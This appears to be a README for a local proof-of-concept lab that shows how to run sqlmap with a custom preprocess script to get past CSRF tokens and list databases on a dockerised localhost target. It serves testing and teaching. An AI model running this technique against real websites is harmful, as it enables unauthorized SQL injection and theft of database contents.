git clone https://github.com/itasahobby/CSRF_SQLMap_Bypass.git
docker-compose -f .\docker\docker-compose.yaml up --build
Run the following sqlmap command:
sqlmap -u "http://localhost/index.php?action=0" --method GET --preprocess ./poc/preprocess.py --batch --dbs
There is a more in depth writeup in my blog.
Idea inspired by Dreg